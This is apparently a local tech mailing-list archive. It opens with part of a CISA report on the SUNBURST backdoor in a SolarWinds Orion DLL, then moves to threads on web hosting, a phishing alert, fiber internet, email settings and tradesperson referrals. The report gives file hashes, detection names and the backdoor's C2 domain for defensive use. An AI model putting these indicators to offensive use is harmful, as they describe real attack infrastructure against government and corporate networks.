  SHA512: 5cbfefe612a40c8872a0faf3db8d3835dc514fb3df159610095b47c595c6caa1ada79cce2b10fb99e648990c3f54f63344d1fa7025090bfcd4e2c55d7210a28d
  ssdeep: 12288:dJKoHwfn/jz3bbO4Qag2I97PMieSLezPKT+cYvjenWHuhh9c0g8vkzE19Wv:rEfDbO97P8TrKhYbenWH4c0g8vkzE19e
  Entropy: 5.579997

Antivirus
  Ahnlab: Backdoor/Win32.SunBurst
  Antiy: Trojan[Backdoor]/MSIL.Agent
  Avira: TR/Sunburst.AH
  BitDefender: Trojan.Sunburst.A
  Clamav: Win.Countermeasure.Sunburst-9809152-0
  Comodo: Backdoor
  Cyren: W32/Trojan.QTKK-7476
  ESET: a variant of MSIL/SunBurst.A trojan
  Emsisoft: Trojan.Win32.Sunburst (A)
  Ikarus: Backdoor.Sunburst
  K7: Trojan ( 00574a531 )
  Lavasoft: Trojan.Sunburst.A
  McAfee: Trojan-sunburst
  Microsoft Security Essentials: Trojan:MSIL/Solorigate.BR!dha
  NANOAV: Trojan.Win32.SunBurst.iduxfm
  NetGate: Trojan.Win32.Malware
  Sophos: Mal/Sunburst-A
  Symantec: Backdoor.Sunburst
  Systweak: trojan-backdoor.sunburst-r
  TrendMicro: Backdoo.6F8C6A1E
  TrendMicro House Call: Backdoo.6F8C6A1E
  VirusBlokAda: TScope.Trojan.MSIL
  Zillya!: Trojan.SunBurst.Win32.1

YARA Rules
  This file is matched by the same three rules listed above for ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 (CISA_10318927_01, FireEye_20_00025668_01 and FireEye_20_00025668_02); the rule text is identical and is not repeated here.

ssdeep Matches
  94  ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6

PE Metadata
  Compile Date: 2020-04-21 10:53:33-04:00
  Import Hash: dae02f32a21e03ce65412f6e56942daa
  Company Name: SolarWinds Worldwide, LLC.
  File Description: SolarWinds.Orion.Core.BusinessLayer
  Internal Name: SolarWinds.Orion.Core.BusinessLayer.dll
  Legal Copyright: Copyright © 1999-2020 SolarWinds Worldwide, LLC. All Rights Reserved.
  Original Filename: SolarWinds.Orion.Core.BusinessLayer.dll
  Product Name: SolarWinds.Orion.Core.BusinessLayer
  Product Version: 2020.2.5200.12394

PE Sections
  MD5                               Name    Raw Size  Entropy
  7810cd48d16fb0d3c3a0c855f2d9225a  header  512       2.907043
  f249efb5d984eb62f325179a721985f3  .text   1018368   5.567580
  9aea23ae0750b77218d9a85d4896eb0c  .rsrc   1536      3.005835
  0db83a842dbb0bb3396691d4238bd216  .reloc  512       0.101910

Description
  This file has been identified as a SolarWinds Application module containing a patched-in SUNBURST backdoor. This embedded SUNBURST code contains the same functions as "SolarWinds.Orion.Core.BusinessLayer.dll" (32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77), and is signed with the same digital certificate.

Relationship Summary
  32519b85c0...   Connected_To      avsvmcloud.com
  32519b85c0...   Contained_Within  d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600
  avsvmcloud.com  Connected_From    32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77
  d0d626deb3...   Contains          32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77

Conclusion

Please refer to the following resources for additional information and mitigation actions related to this campaign:

1) Alert (AA20-352A): Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
   https://us-cert.cisa.gov/ncas/alerts/aa20-352a

2) Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise
   https://cyber.dhs.gov/ed/21-01/

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

* Maintain up-to-date antivirus signatures and engines.
* Keep operating system patches up-to-date.
* Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
* Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
* Enforce a strong password policy and implement regular password changes.
* Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
* Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
* Disable unnecessary services on agency workstations and servers.
* Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
* Monitor users' web browsing habits; restrict access to sites with unfavorable content.
* Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
* Scan all software downloaded from the Internet prior to executing.
* Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, *"Guide to Malware Incident Prevention & Handling for Desktops and Laptops".*

Contact Information

* 1-888-282-0870
* CISA Service Desk (UNCLASS)
* CISA SIPR (SIPRNET)
* CISA IC (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.surveymonkey.com/r/G8STDRY

Document FAQ

*What is a MIFR?* A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

*What is a MAR?* A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

*Can I edit this document?* This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to CISA at 1-888-282-0870 or the CISA Service Desk.

*Can I submit malware to CISA?* Malware samples can be submitted via three methods:

* Web: https://malware.us-cert.gov
* E-Mail: submit at malware.us-cert.gov
* FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Revisions

* February 8, 2021: Initial Version

------------------------------------------------------------------------

This product is provided subject to this Notification and this Privacy & Use policy.

This email was sent to michaelk at tnrglobal.com using GovDelivery Communications Cloud, on behalf of: Cybersecurity and Infrastructure Security Agency, 707 17th St, Suite 4000, Denver, CO 80202
From sam at itabix.com Mon Feb 8 16:25:49 2021
From: sam at itabix.com (Sam McClellan)
Date: Mon, 8 Feb 2021 11:25:49 -0500
Subject: [Hidden-tech] who is local who does website ux/ui/branding ?
In-Reply-To:
References: <6246f433-4a11-789c-7f3e-8152f6cb1b31@tnrglobal.com> <124973595.236800.1612281715321@webmail.networksolutionsemail.com> <83d2f1d8-a246-d252-1cbe-3f7847a31bd8@itabix.com>
Message-ID: <84a90e71-873c-ef5f-d7d1-10339e2cd3ea@itabix.com>

Hi Rob,

Thanks for asking!

I've been doing web development since 1998, and started Itabix in 2000 because I was frustrated with the division between development and hosting where, for example, if your site got hacked, the hosting company would threaten to shut you off in a day or two (or would actually just suspend you) and often the web designer wasn't available or didn't have enough tech savvy to fix it. If a site we're hosting breaks we fix it inexpensively, or free if you're on our managed hosting. And we do things like track the domain names we host to make sure they don't expire or get hijacked.

Itabix is a distributed company. Right now I'm the only one in our office in Hadley; everyone else is remote. We have 24/7 first tier support.

We've gradually grown to be a one stop shop for pretty much everything needed for a web presence for small to medium businesses. So far we've never advertised, and depend on word of mouth entirely, which is one reason our prices are so low.

> Website security

* We have a great server management team in the UK, and I also have the servers security audited every few months by another firm.
* Our servers all have colo level DDOS protection and are hosted in major multihomed telcos.
* We use CloudLinux which is great at managing resources so one site doesn't take over the server.
* We use LiteSpeed for the web server which is fantastic, lowers the server load by about 300% in my experience along with speeding it up, and their free caching plugin for WordPress works with the webserver (the webserver actually does the caching, the plugin just manages it) and is as good as WP Rocket without the $49/year.
* We use ImmunifyAV+ which imo is the best antivirus/antimalware system for Linux webservers and changed my life. It just takes care of everything; we have had very few malware attacks that needed manual attention since we started using it several years ago.
* We back up sites daily using JetBackup which is much better than the default cPanel backup - much lower server load and great to use. Backups are kept for at least three months.
* Hosting servers are optimized for WordPress.
* We have 24/7 first tier support.
* For high load websites, especially those with a history of being hacked, we usually recommend Sucuri which does CDN at least as well as Cloudflare and has a much better firewall along with actually fixing issues if they come up, for a lot less.
* For websites we manage, we typically use the All In One WP Security plugin along with keeping the site up to date and watching out for possibly insecure themes and plugins, making sure all directories aren't readable, and we can also do various things like disabling file editing inside WordPress, securing wp-includes, etc.

> technical SEO within general SEO, Local SEO, PPC search vs. display,
> ROI planning

I would say this is our weakest area. We aren't going to be nearly as good as a specialized firm such as yours, but for a lot of our clients getting most of their top 10 keywords onto the first page of Google is typically about all they want and can afford, and my SEO guy has done a great job with that. That being said, I'd invite you to talk more about your team -- I'd love to have someone to refer any higher need clients to.

> website design

I've been doing web development and design for 23 years, and I do most of the design work, but I do have a designer on our team that is very good, although a bit mainstream for my taste, and we also happily work for/with/partner with outside designers.

I'm very focused on UX. I've studied psychology and done a lot of research on how people respond to website UI and the unconscious drivers that can make a website feel pleasant and engaging or frustrating and tiring. Along with the normal readability (consistent style, appropriate contrast, readable font face and size, balanced whitespace, word and line spacing, etc.) and navigation issues are things like presenting to the three major learning styles, designing for the visual cortex, using visual anchors so people don't have to keep re-finding their place, presenting easily grasped paths for different subjects or learning styles, avoiding "buckets" where you have to use the browser back arrow to get to the next thing, etc.

> website coding

I've hired individual programmers around the world (US, Russia, Ukraine, Serbia, Brazil, India, Bangladesh) for most of our history, but in 2014 I found a truly great programming team in India with an extremely savvy manager who is also a very good, very honorable person. I've yet to find anything they can't do well with websites, plugins, mobile apps and, lately, video conferencing. We have three dedicated full time programmers right now and can call in others as needed. We specialize in WordPress and PHP but we've got people who can work in pretty much any popular language or platform.

I hope this answers your questions.

Best,
Sam

*Sam McClellan*
*Itabix, Inc*
*one place for all things web*
*sam at itabix.com*
*https://itabix.com*
*Main - 413.587.4600*
*Toll-free - 877-7ITABIX (877.748.2249)*

On 2/8/2021 8:52 AM, Rob Laporte wrote:
> Hi Sam,
>
> Wow, Itabix does a lot. Years ago my search marketing firm began
> extricating ourselves from any web dev, to focus on our core expertise
> in search marketing and conversion rate optimization, and to avoid the
> burgeoning complexity, risks, and potential /legal liabilities/ in web
> dev and hosting. We often refer clients and prospects to firms we
> like. I have a few questions I share with the HT list here, so all may
> know. I suggest putting such answers on your About Us page.
>
> Who is on your team, and what are their specialties and backgrounds?
> I've found that these days, and increasingly, adequacy, to say nothing
> of excellence, requires ever more specialization. Website security,
> technical SEO within general SEO, Local SEO, PPC search vs. display,
> ROI planning, website design, website coding (even in WP), and more,
> increasingly demand one dedicated pro for each.
>
> If your team can pull off adequacy in all the services on your
> website--and for the incredible prices you cite--your team and
> management systems must be first-rate, and worth Western Mass knowing
> about.
>
> Take Care,
>
> Rob Laporte
>
> Chief Business Development Officer | Founder | Chairman
>
> DISC - Making Websites Make Money
>
> 413-584-6500
>
> rob at 2disc.com | LinkedIn | 2DISC.com
>
> *NOTE:* Emails can be blocked by spam filters throughout the web. If
> you don't get a reply within an expected span of time, please call.
>
> ------------------------------------------------------------------------
> *From:* Hidden-discuss on behalf of Sam McClellan via Hidden-discuss
> *Sent:* Tuesday, February 2, 2021 1:27 PM
> *To:* hidden-discuss at lists.hidden-tech.net
> *Subject:* Re: [Hidden-tech] who is local who does website ux/ui/branding ?
>
> Hi Rich,
>
> Sorry I haven't answered until now, lots going on. It's a bit of a
> difficult question to answer accurately just based on your
> description. It seems like they would be simple sites - I'd venture a
> range between $700 and $1500 depending on how much we'd need to
> customize the WordPress theme and how we'd connect and display the
> data sources. And if you wanted multiple sites that use features from
> the first site, that would lower the cost for the additional sites.
>
> I can give you some examples of sites we've done along with their cost.
>
> https://connectingpoint.nepm.org/
> We just finished doing a complete redesign for New England Public
> Media's Western Mass television news show. The site was originally an
> archival site; they wanted to switch it to be more interactive and
> live and they wanted something very clean and light to highlight the
> images and video feeds. We switched to a different theme (Divi is our
> go-to these days). We needed to script the blog pages and the slider
> to allow for using either an image or a video from either YouTube or
> their proprietary system.
> The site includes a timer function: at midnight on Friday it shows a
> countdown to 6pm along with information and images about
> the episode along with buttons for adding you to their mailing list
> and another to be put on a reminder list for upcoming shows. When the
> countdown ends at 6pm it refreshes the page and shows the live feed
> and hides the episode information, then at 6:30 it switches back to
> the normal site. $2,500.
>
> https://presencia.nepm.org/
> Also for New England Public Media, we developed this bilingual website
> for their show. Similar issue with displaying the blog post videos or
> images. $1730.
>
> https://www.aomtheatre.com/
> Converted the existing WordPress site and set up a custom ticket
> selection system. $1400.
>
> https://mitsuwa.com/
> We developed this site for a Chicago advertising agency that has
> Mitsuwa, a national Japanese grocery store chain, as their client. The
> ad agency gives us the design and we implement it. We converted their
> site to Divi, as well.
> We developed a complex system for them where they can import a batch
> of products in an Excel spreadsheet (and upload images) to display
> their products for each of the stores, for a video feed in their
> stores, for upcoming sales and for vendors and management to preview
> upcoming sales before they go live. In addition, they can set up
> banner images and events with images and text. All of these (product
> batches, individual banners, and individual events) are set to display
> in any particular store according to an assigned date range.
> They keep adding functions so I'll just say the conversion to Divi and
> basic functions I described were approx. $10,000. We're also currently
> working on a shopping cart system that organizes pickups and
> deliveries for $5760.
>
> https://www.kimata.com/
> Another site we developed for the Chicago advertising agency which
> supplied the design. A personnel site in English and Japanese
> displaying available jobs in the US and a separate site for Mexico. We
> created a backend system for managing both applicants and companies.
> $7500.
>
> https://inner-act.com/
> Converted an existing site to WordPress and re-developed it and
> created the animations; they supplied the logo. $1700.
>
> Simpler sites we developed and created the logo for:
> https://oilco-op.com/ - also developed the
> slideshow, and developed a custom member signup and management system
> with three different tiers and different pricing depending on the
> month you sign up. $1900.
> https://wellspringneuro.com/ $650.
> https://adimech.com/ $650.
> https://optimalbrain.com/ $650.
>
> best,
> Sam
>
> *Sam McClellan*
> *Itabix, Inc*
> *one place for all things web*
> *sam at itabix.com*
> *https://itabix.com*
> *Main - 413.587.4600*
> *Toll-free - 877-7ITABIX (877.748.2249)*

From rich at tnrglobal.com Wed Feb 10 18:55:38 2021
From: rich at tnrglobal.com (Rich@tnr)
Date: Wed, 10 Feb 2021 13:55:38 -0500
Subject: [Hidden-tech] Heads up - phishing on the rise
Message-ID: <7da6a447-8a31-ad9f-248a-687b7a4d05e9@tnrglobal.com>

Just a warning that (as webmaster) I've gotten a couple of reports of phishing coming to list members that looks like HT listings. Specifically, the subject seen has been:

Re: [Hidden-tech] * * * Archiving contact list from Android phone * * *

And it has an xls attachment that asks for extended access that would open your machine to attack. As with any alerts, watch for attachments, which HT does not allow.

As with any emails, there is no validation as to who the email is coming from - you have to look at the internal headers, esp. FROM, to see if this is a proper list entry - it will have
Received: from dmoz.awboc.com (mm02.tnrnet.com [3.17.96.37]) just to be clear, the archives are public without raw emails - email are in the archives encoded into text. -- Rich Roth CEO TnR Global Bio and personal blog: http://rizbang.com Building the really big sites: http://www.tnrglobal.com Small/Soho business in the PV: http://www.hidden-tech.net Places to meet for business: http://www.meetmewhere.com And for Arts and relaxation: http://TarotMuertos.com - Artistic Tarot Deck http://www.welovemuseums.com http://www.artonmytv.com/ Helping move the world: http://www.earththrives.com From jm-hiddentech at vj8.net Wed Feb 10 19:11:16 2021 From: jm-hiddentech at vj8.net (James Triplett) Date: Wed, 10 Feb 2021 14:11:16 -0500 Subject: [Hidden-tech] Fiber Internet in Greenfield? In-Reply-To: <7da6a447-8a31-ad9f-248a-687b7a4d05e9@tnrglobal.com> References: <7da6a447-8a31-ad9f-248a-687b7a4d05e9@tnrglobal.com> Message-ID: <20210210191116.jhxfsieloex5hnus@bermuda.datamat.net> I surfed around on the Mass Broadband Initiative site, and there's lots of ambitious plans, but I wonder what's actually available now. Is it possible to get a solid symmetric Internet connection in Greenfield? I'm hoping to find one good enough for realtime streaming- perhaps 20 or 30 mbps upload? Typical cable modem Internet, as most know, is highly assymmetric: my connection here in Amherst is around 60mbps down and 6mbps up. thanks, James From matthew at crocker.com Wed Feb 10 20:28:32 2021 From: matthew at crocker.com (Matthew Crocker) Date: Wed, 10 Feb 2021 20:28:32 +0000 Subject: [Hidden-tech] Fiber Internet in Greenfield? In-Reply-To: <20210210191116.jhxfsieloex5hnus@bermuda.datamat.net> References: <7da6a447-8a31-ad9f-248a-687b7a4d05e9@tnrglobal.com> <20210210191116.jhxfsieloex5hnus@bermuda.datamat.net> Message-ID: <010001778da19246-409d1ca6-49a4-40c6-bb95-95b3a235b66f-000000@email.amazonses.com> James, What is the address you are looking for? 
MBI can do lateral builds, not sure if 20-30 mbps is big enough to justify the cost though. Have you looked at GCET?

-Matt

On 2/10/21, 3:26 PM, "Hidden-discuss on behalf of James Triplett via Hidden-discuss" wrote:

I surfed around on the Mass Broadband Initiative site, and there's lots of ambitious plans, but I wonder what's actually available now. Is it possible to get a solid symmetric Internet connection in Greenfield? I'm hoping to find one good enough for realtime streaming - perhaps 20 or 30 mbps upload?

Typical cable modem Internet, as most know, is highly asymmetric: my connection here in Amherst is around 60mbps down and 6mbps up.

thanks,
James

_______________________________________________
Hidden-discuss mailing list - home page: http://www.hidden-tech.net
Hidden-discuss at lists.hidden-tech.net

You are receiving this because you are on the Hidden-Tech Discussion list.
If you would like to change your list preferences, Go to the Members
page on the Hidden Tech Web site.
http://www.hidden-tech.net/members

From phake at hitpointstudios.com Wed Feb 10 20:40:29 2021
From: phake at hitpointstudios.com (Paul Hake)
Date: Wed, 10 Feb 2021 15:40:29 -0500
Subject: [Hidden-tech] Fiber Internet in Greenfield?
In-Reply-To: <20210210191116.jhxfsieloex5hnus@bermuda.datamat.net>
References: <7da6a447-8a31-ad9f-248a-687b7a4d05e9@tnrglobal.com> <20210210191116.jhxfsieloex5hnus@bermuda.datamat.net>
Message-ID: 

Hi James,

We've been happy with our GCET commercial fiber line at our coworking space in Greenfield. Right now I'm at 387mb down and 402mb up when plugged in and it usually hovers around there. We also just got residential fiber where I live in Leyden and it's about that same speed or faster, which is amazing considering we had only DSL as an option in mid-2020. I know a lot of the towns around Greenfield are also setting up their own fiber networks as well. We're fortunate to have the options! Good luck.
Best,
Paul

[image: Screen Shot 2021-02-10 at 3.34.40 PM.png]

On Wed, Feb 10, 2021 at 3:26 PM James Triplett via Hidden-discuss <hidden-discuss at lists.hidden-tech.net> wrote:

> I surfed around on the Mass Broadband Initiative site, and there's lots of ambitious plans, but I wonder what's actually available now.
> Is it possible to get a solid symmetric Internet connection in Greenfield? I'm hoping to find one good enough for realtime streaming - perhaps 20 or 30 mbps upload?
>
> Typical cable modem Internet, as most know, is highly asymmetric: my connection here in Amherst is around 60mbps down and 6mbps up.
>
> thanks,
> James

-- 
Paul B. Hake - CEO
HitPoint Inc.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: Screen Shot 2021-02-10 at 3.34.40 PM.png
Type: image/png
Size: 39451 bytes
Desc: not available
URL: 

From paul at bissex.net Wed Feb 10 21:44:35 2021
From: paul at bissex.net (Paul Bissex)
Date: Wed, 10 Feb 2021 16:44:35 -0500
Subject: [Hidden-tech] Fiber Internet in Greenfield?
In-Reply-To: <20210210191116.jhxfsieloex5hnus@bermuda.datamat.net>
References: <7da6a447-8a31-ad9f-248a-687b7a4d05e9@tnrglobal.com> <20210210191116.jhxfsieloex5hnus@bermuda.datamat.net>
Message-ID: 

If you're in Greenfield, I recommend GCET for sure. Half the price of Comcast (for residential anyway), reliable, and 30Mbps+ symmetric. Speed test I just ran shows about 34 down, 38 up, which is not atypical.
https://i.speedof.me/210210213856-50

P

On 2/10/21 2:11 PM, James Triplett via Hidden-discuss wrote:
> I surfed around on the Mass Broadband Initiative site, and there's lots of ambitious plans, but I wonder what's actually available now.
> Is it possible to get a solid symmetric Internet connection in Greenfield? I'm hoping to find one good enough for realtime streaming - perhaps 20 or 30 mbps upload?
>
> Typical cable modem Internet, as most know, is highly asymmetric: my connection here in Amherst is around 60mbps down and 6mbps up.
>
> thanks,
> James

-- 
Paul Bissex, software engineer
http://paulbissex.com/
Greenfield MA 01301 USA
413-230-9451

From shel at principledprofit.com Thu Feb 11 00:20:39 2021
From: shel at principledprofit.com (Shel Horowitz)
Date: Wed, 10 Feb 2021 19:20:39 -0500
Subject: [Hidden-tech] Apple Mail/GMail question
Message-ID: 

I never use the Apple Mail program on my 2015 MacBook Air running High Sierra 10.13.6, but apparently I configured it at some point. Somehow it just got set to chime every time an email went in, so I went in to change the setting--and found 440,000 messages there!

My question: If I empty the Apple Mail inbox, will all these messages still be in GMail where I want and need them?
Thanks in advance,

Shel Horowitz - "The Transformpreneur"
________________________________________________
Contact me to bake in profitability while addressing hunger, poverty, war, and catastrophic climate change
* First business ever to be Green America Gold Certified
* Inducted into the National Environmental Hall of Fame
* Certified speaker: International Platform Association
http://goingbeyondsustainability.com
mailto:shel at greenandprofitable.com 413-586-2388
Award-winning, best-selling author of 10 books.
Latest: Guerrilla Marketing to Heal the World (co-authored with Jay Conrad Levinson)

Watch my TEDx Talk, "Impossible is a Dare: Business for a Better World"
http://www.ted.com/tedx/events/11809 (move your mouse to "event videos")
_________________________________________________

From s at smichel.me Thu Feb 11 18:04:55 2021
From: s at smichel.me (Stephen Michel)
Date: Thu, 11 Feb 2021 13:04:55 -0500
Subject: [Hidden-tech] Apple Mail/GMail question
In-Reply-To: 
References: 
Message-ID: <78MDOQ.VZMVZ6LPVKAI3@smichel.me>

Probably not.

I haven't used GMail for a while so take this with a grain of salt, but I believe that GMail now has automatic filters into tabs like "promotions", etc. However, I believe this is only cosmetic - while they are shown differently, they are actually all stored in the inbox. So when you connect with an external program like Apple Mail, it sees the emails from all these "automatic filters". It would not affect any emails that you've archived (that actually *is* moving to a different folder), so if you don't care about anything in those other tabs, it would be fine to delete.

Again, I don't have a GMail account, so this is more of an educated guess; I would appreciate if someone who uses GMail & an external client could confirm.

-- 
To respect your time, I try to write short, functional emails.
On Wed, Feb 10, 2021 at 19:20, Shel Horowitz via Hidden-discuss wrote:
> I never use the Apple Mail program on my 2015 MacBook Air running High Sierra 10.13.6, but apparently I configured it at some point. Somehow it just got set to chime every time an email went in, so I went in to change the setting--and found 440,000 messages there!
>
> My question: If I empty the Apple Mail inbox, will all these messages still be in GMail where I want and need them?
>
> Thanks in advance,
>
> Shel Horowitz - "The Transformpreneur"

From annamarie at PatientSympatheticCoaching.com Thu Feb 11 18:23:08 2021
From: annamarie at PatientSympatheticCoaching.com (Annamarie Pluhar)
Date: Thu, 11 Feb 2021 13:23:08 -0500
Subject: [Hidden-tech] Apple Mail/GMail question
In-Reply-To: 
References: 
Message-ID: 

No. Recommend you either remove the account on the MBA or archive your messages in Gmail.

Annamarie Pluhar
[Patient, Sympathetic Coaching](http://patientsympatheticcoaching.com)

On 10 Feb 2021, at 19:20, Shel Horowitz via Hidden-discuss wrote:

> I never use the Apple Mail program on my 2015 MacBook Air running High Sierra 10.13.6, but apparently I configured it at some point.
> Somehow it just got set to chime every time an email went in, so I went in to change the setting--and found 440,000 messages there!
>
> My question: If I empty the Apple Mail inbox, will all these messages still be in GMail where I want and need them?
>
> Thanks in advance,
>
> Shel Horowitz - "The Transformpreneur"

From debchandler411 at gmail.com Thu Feb 11 18:43:55 2021
From: debchandler411 at gmail.com (Deborah Chandler)
Date: Thu, 11 Feb 2021 13:43:55 -0500
Subject: [Hidden-tech] * * * Furniture refinishers? * * *
Message-ID: 

Hi folks,

Does anyone know of a furniture refinisher who can refinish the top of a desk?

Thanks,
Deb

From shel at principledprofit.com Thu Feb 11 19:05:15 2021
From: shel at principledprofit.com (Shel Horowitz)
Date: Thu, 11 Feb 2021 14:05:15 -0500
Subject: [Hidden-tech] Apple Mail/GMail question
In-Reply-To: 
References: 
Message-ID: 

Thanks. What is an MBA as you're using it here? And when you say no, you mean no it won't delete my gmail to empty the box or no, don't do it?

Shel Horowitz - "The Transformpreneur"

On Thu, Feb 11, 2021 at 1:23 PM Annamarie Pluhar <annamarie at patientsympatheticcoaching.com> wrote:

> No. Recommend you either remove the account on the MBA or archive your messages in Gmail.
>
> Annamarie Pluhar
> Patient, Sympathetic Coaching
>
> On 10 Feb 2021, at 19:20, Shel Horowitz via Hidden-discuss wrote:
>
> I never use the Apple Mail program on my 2015 MacBook Air running High Sierra 10.13.6, but apparently I configured it at some point. Somehow it just got set to chime every time an email went in, so I went in to change the setting--and found 440,000 messages there!
>
> My question: If I empty the Apple Mail inbox, will all these messages still be in GMail where I want and need them?
>
> Thanks in advance,
>
> Shel Horowitz - "The Transformpreneur"

From andrew at stakeholderscapital.com Fri Feb 12 14:41:13 2021
From: andrew at stakeholderscapital.com (Andrew Bellak)
Date: Fri, 12 Feb 2021 09:41:13 -0500
Subject: [Hidden-tech] * * * Furniture refinishers? * * *
In-Reply-To: 
References: 
Message-ID: <89AADA76-BA53-4E1A-9558-B2D9177100C3@stakeholderscapital.com>

You could try Fesha Buddah. Tel: 510-409-7116

He did a really nice job making a table for us.
Andrew Bellak
CEO
Registered Investment Advisor
andrew at StakeholdersCapital.com
www.StakeholdersCapital.com
(o) 888-STK-HLDR (785-4537) x.2
(o) 413-306-3244
(f) 888-735-HLDR (4537)
skype = andrewbellak
twitter = stakeholderscap
linkedin = http://ow.ly/4nn255
facebook = https://www.facebook.com/StakeHoldersCapital/

This message is intended only for the personal and confidential use of the designated recipient(s) named above. If you are not the intended recipient of this message you are hereby notified that any review, dissemination, distribution or copying of this message is strictly prohibited. This communication is for information purposes only and should not be regarded as an offer to sell or as a solicitation of an offer to buy any financial product, an official confirmation of any transaction, or as an official statement of Stakeholders Capital. Email transmission cannot be guaranteed to be secure or error-free. Therefore, we do not represent that this information is complete or accurate and it should not be relied upon as such. All information is subject to change without notice. This e-mail may be considered advertising under federal law. If you do not want to receive similar commercial electronic mail messages in the future from Stakeholders Capital, you may change your e-mail preferences at any time by contacting our office. Please consider the environment before printing this email.

Sent from my iPhone

> On Feb 11, 2021, at 5:42 PM, Deborah Chandler via Hidden-discuss wrote:
>
> Hi folks,
>
> Does anyone know of a furniture refinisher who can refinish the top of a desk?
>
> Thanks,
> Deb

From dstevens at tryandfindit.com Sun Feb 14 23:17:55 2021
From: dstevens at tryandfindit.com (Donald M Stevens)
Date: Sun, 14 Feb 2021 23:17:55 +0000
Subject: [Hidden-tech] looking for someone that does sewer line / pipe repair
Message-ID: 

Happy Valentine's Day all!

I am looking for a contractor that repairs sewer lines. I have a repair needed for my house in East Longmeadow.

I need a replacement of pipe and clean-out added.

Thanks!

Don

TFI Technologies
"we are here to help you...."
329 Pease Road
East Longmeadow, MA 01028
Office: 413.308.4511
Cell / Text: 860.614.4153
Email: dstevens at tryandfindit.com
LinkedIn: linkedin.com/in/don-stevens-504aa6b
Skype: tryandfindit

From andrew at stakeholderscapital.com Sun Feb 14 23:22:54 2021
From: andrew at stakeholderscapital.com (Andrew Bellak)
Date: Sun, 14 Feb 2021 18:22:54 -0500
Subject: [Hidden-tech] looking for someone that does sewer line / pipe repair
In-Reply-To: 
References: 
Message-ID: <2a369243-e275-158e-6739-efa0032009da@stakeholderscapital.com>

I just used Mark Dansereau of Western MA Rooter. He's terrific. (413) 253-1505

On 2/14/2021 6:17 PM, Donald M Stevens via Hidden-discuss wrote:
>
> Happy Valentine's Day all!
>
> I am looking for a contractor that repairs sewer lines. I have a repair needed for my house in East Longmeadow.
>
> I need a replacement of pipe and clean-out added.
>
> Thanks!
>
> Don

-- 
Andrew Bellak
CEO
Registered Investment Advisor
Andrew at StakeholdersCapital.com
(o) 888-STK-HLDR (785-4537) x.2
(f) 888-735-HLDR (4537)
he/him
skype = andrewbellak
twitter = @andrewbellak, @stakeholderscap
From delowing at gmail.com Mon Feb 15 03:56:05 2021
From: delowing at gmail.com (Doug Lowing)
Date: Sun, 14 Feb 2021 22:56:05 -0500
Subject: [Hidden-tech] possibility: consider standard employment at this healthcare software co
Message-ID: 

Hi Techies -

A thought, entirely up to you. If this seems like spam, please have the moderators kill it. OTOH, the company could really use help servicing MA Medicaid.

I acknowledge many of you are way ahead of me in technical abilities. If you want to try working for a company remotely with the usual for-hire benefits and detractions, I suggest looking at HealthEdge based out of Burlington MA. I get nothing out of this. Entirely your choice.

I currently work for a company acquired by HealthEdge and they seem to try to balance life and work. I have worked remotely for the past year for a company based out of VA because of the pandemic, NP with them. Switched to the company from Burlington MA, np with them.

I would really like to see extremely competent people making health software for MA better, bc the current stuff is, er, really needs improvement.

Doug Lowing

From dstevens at tryandfindit.com Mon Feb 15 14:13:22 2021
From: dstevens at tryandfindit.com (Donald M Stevens)
Date: Mon, 15 Feb 2021 14:13:22 +0000
Subject: [Hidden-tech] looking for someone that does sewer line / pipe repair
In-Reply-To: 
References: 
Message-ID: 

Thanks for getting back to me Doug and Andrew,

Here is a little more information,

I have had the "water jet" snake and camera process already done,
"water jet" snake cleared it up last year temporarily,
Camera showed roots in the line at 170',
The auger / drill type snake that can cut through roots only goes 150',
My sewer line is over 200'
long, with no clean-out in between my house and the road,

So what I am looking for is someone to dig up,
replace the pipe that is infiltrated by tree roots,
then put in a clean out so that in the future someone could snake up the line or down the line to clear any future clogs.

I have been calling contractors, but can't get a call back, or the 2-3 people that did call back, don't come out.
Maybe it's a small job, or I think because of all the snow storms, many of these contractors are out plowing, and that has been keeping them busy.

Thanks!

Don

TFI Technologies
"we are here to help you...."
329 Pease Road
East Longmeadow, MA 01028
Office: 413.224.1568
Cell / Text: 860.614.4153
Email: dstevens at tryandfindit.com
LinkedIn: linkedin.com/in/don-stevens-504aa6b
Skype: tryandfindit

From: Doug Lowing
Sent: Sunday, February 14, 2021 10:26 PM
To: Donald M Stevens
Subject: Re: [Hidden-tech] looking for someone that does sewer line / pipe repair

Hidden tech we may be, but when it gets down to it, we all realize the most important part of modern technology - a toilet that flushes successfully

